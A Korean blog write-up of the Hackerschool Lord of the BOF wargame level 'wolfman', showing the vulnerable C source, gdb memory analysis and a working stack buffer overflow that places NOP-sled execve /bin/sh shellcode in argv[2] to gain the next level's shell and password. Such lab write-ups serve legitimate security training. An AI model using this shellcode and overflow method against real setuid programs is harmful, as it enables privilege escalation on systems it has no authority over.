LOB_orc
[orc@localhost orc]$ bash2 [orc@localhost orc]$ cat wolfman.c /* The Lord of the BOF : The Fellowship of the BOF - wolfman - egghunter + buffer hunter */ #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); } // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47] != '\xbf') { printf("stack is still your friend.\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); } |
bash2 띄우고~~ 힌트를 보면.. 버퍼 헌터라는 부분이 추가되었네요.
memset함수를 이용해서 buffer 40바이트를 0으로 초기화시키네요
어렵지 않게 이번에도 argv[2]를 이용하면 될 것 같습니다.
먼저 gdb로 분석후 메모리 구조를 그려보겠습니다~
(gdb) disas main Dump of assembler code for function main: 0x8048500 <main>: push %ebp 0x8048501 <main+1>: mov %esp,%ebp 0x8048503 <main+3>: sub $0x2c,%esp …생략… 0x80485b6 <main+182>: mov (%eax),%edx 0x80485b8 <main+184>: push %edx 0x80485b9 <main+185>: lea 0xffffffd8(%ebp),%eax 0x80485bc <main+188>: push %eax 0x80485bd <main+189>: call 0x8048440 <strcpy> ...생략... |
0x2c(44바이트)의 메모리를 확보하는게 보이네요
argv[2] |
argv[1] |
argv[0] |
argc |
… |
RET [4] |
SFP [4] |
buffer [40] |
i [4] |
main+189에서의 edx(argv[1]의 주소)를 확인해 argv[2]의 주소를 찾겠습니다.
(gdb) b * main+189 Breakpoint 1 at 0x80485bd (gdb) r `perl -e 'print "\xbf"x48'` `perl -e 'print "A"x50'` Starting program: /home/orc/tmp/wolfman `perl -e 'print "\xbf"x48'` `perl -e 'print "A"x50'` Breakpoint 1, 0x80485bd in main () (gdb) info reg eax 0xbffffa40 -1073743296 ecx 0x0 0 edx 0xbffffbda -1073742886 ebx 0x401081ec 1074823660 esp 0xbffffa34 -1073743308 ebp 0xbffffa68 -1073743256 …생략… (gdb) x/40x $edx 0xbffffbda: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbea: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffbfa: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbffffc0a: 0x41414100 0x41414141 0x41414141 0x41414141 0xbffffc1a: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc2a: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffc3a: 0x00414141 0x00000000 0x00000000 0x00000000 …생략… |
argv[2]의 주소는 0xbffffc0b가 되겠네요ㅎㅎ nop을 넣어주고 넉넉하게 0xbffffc1a로 공격하겠습니다!
[orc@localhost orc]$ ./wolfman `perl -e 'print "A"x44,"\x1a\xfc\xff\xbf"'` `perl -e 'print "\x90"x20, "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ id uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc) bash$ my-pass euid = 505 love eyuna |
wolfman의 셸을 획득했습니다ㅎㅎ
'System Hacking > 해커스쿨 LOB' 카테고리의 다른 글
| 해커스쿨 LOB ( darkelf -> orge ) by ORANG (0) | 2014.10.20 |
|---|---|
| 해커스쿨 LOB ( wolfman -> darkelf ) by ORANG (0) | 2014.10.20 |
| 해커스쿨 LOB ( goblin -> orc ) by ORANG (1) | 2014.10.20 |
| 해커스쿨 LOB ( cobolt -> goblin ) by ORANG (0) | 2014.10.20 |
| 해커스쿨 LOB ( gremlin -> cobolt ) by ORANG (0) | 2014.10.20 |